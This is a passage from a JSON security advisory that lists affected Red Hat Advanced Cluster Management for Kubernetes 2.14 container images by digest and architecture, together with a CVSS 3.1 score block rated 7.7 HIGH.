"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6b34944da4fcf630306c6bef503b659b7ed578faf0f5b5e3c0bf2938b1f18247_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:76350af87e31aaa6521d99ee32fefa7792de71d25ade270646f9cbc2332d3725_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:bf7eee7477d52688df5520c2053aa294ae9c4baf4c0c885a0d5ba5a4c7c790c3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:d8eaa77004ccaa78036830fd5872dd2da30ca3ffc0b468b587b7561630640b9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:0ee74288b19b217b917a4719d08bd1ddead9fdc90bac9f9868b8d721e12a8576_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:69517bbf832177af9b8ce276032625b935f3939afbfa05a01bafbe5252416892_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:78b26db7d7a4ba4d63f0d466ee0a4588c5606f64d6617585efbe363903cc2bff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:feffbb2c5cd8b8edb0944e5d1c49bb49aeb902bb6f44343a7e882c060efaa108_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:492e4517ce3576fb77dac831c7bc0ad56914646feed30858918b5e86b00ba71e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:5e1fd4942feef5acc27fbc5fc0ca43956a68c718768bbcc5bf3589cb2dfc389a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:9902b0f5c4d507d881314c621a14aa922c473cad40e5ad0a3b98c47540006fef_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:182c0d1f98ca9809ff1e31387bc19c9a110dba2d49538cc2acae18bb4910c902_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:99f4559ba7f6f1669d774032e080727ab72a3fc85846058e6938266220938e73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:e0465a23af03dcd988bd1aa45161cfd67bb175105766ac425eba9d0bcdabec8d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:11028e9f630af725dceed505e101d54b75ba978cb14607f9940af75f867aa639_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:528d1a9167e0c4b2c5f2dcffe9a96970a92a3df134b76eb4fbeaa5b9cba9f3f1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:f1293017bb56a08f22a0ecd3785e8fea7c6dd9592583fabebbc4c6c3a1ed2cd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:6ce4f2f4e95e49e027d38d76e00e6ab05481389a2f1d7646f0741ca371a93869_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:71a403581e9fb13da9679af97d53daea1efa06142c503b659a07e7ddda0c39cd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:add985bc8ec3f3d6d57266ed76509e0f9b7df16bf3cb698a60f9929ae441d50f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:646a6afc52c83362e32549a0ec09ff4d0677a239ec2b58a82e4374ee3b38053b_arm64",
